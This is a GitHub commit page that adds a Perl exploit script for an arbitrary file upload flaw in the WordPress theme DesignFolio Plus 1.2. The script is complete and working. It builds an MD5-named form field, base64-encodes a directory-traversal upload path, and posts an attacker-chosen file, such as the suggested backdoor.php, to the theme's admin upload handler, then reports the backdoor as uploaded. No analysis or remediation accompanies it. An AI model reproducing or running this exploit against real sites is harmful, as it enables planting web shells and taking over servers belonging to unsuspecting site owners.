Skip to content
Permalink
Browse files Browse the repository at this point in the history
WordPress Theme DesignFolio Plus 1.2 - Arbitrary File Upload Vulnerab…
…ility
  • Loading branch information
CCrashBandicot committed Jul 7, 2015
1 parent 9092287 commit 53f6ae6
Showing 1 changed file with 30 additions and 0 deletions.
30 changes: 30 additions & 0 deletions DesignFolio.pl
@@ -0,0 +1,30 @@
#!/usr/bin/perl

use Digest::MD5 qw(md5 md5_hex);
use MIME::Base64;
use IO::Socket;
use LWP::UserAgent;

system(($^O eq 'MSWin32') ? 'cls' : 'clear');
print "\n\t ! *** # ^_^ # *** !\n\t :p\n\n";

$use = "\n\t [!] ./$0 127.0.0.1 backdoor.php";

($target ,$file) = @ARGV;

die "$use" unless $ARGV[0] && $ARGV[1];

if($target =~ /http:\/\/(.*)\//){ $target = $1; }
elsif($target =~ /http:\/\/(.*)/){ $target = $1; }
elsif($target =~ /https:\/\/(.*)\//){ $target = $1; }
elsif($target =~ /https:\/\/(.*)/){ $target = $1; }

my $addr = inet_ntoa((gethostbyname($target))[4]);
my $digest = md5_hex($addr);
my $dir = encode_base64('../../../../');

my $ua = LWP::UserAgent->new( agent => q{Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36},);
$pst = $ua->post("http://".$target."/wp-content/themes/designfolio-plus/admin/upload-file.php", Content_Type => 'form-data', Content => [ $digest => [$file] , upload_path => $dir ]);
if($pst->is_success) { print "[+] Backdoor Uploaded !"; } else { print "\n [-] Bad Response Header :/ FAIL"; }

__END__

0 comments on commit 53f6ae6

Please sign in to comment.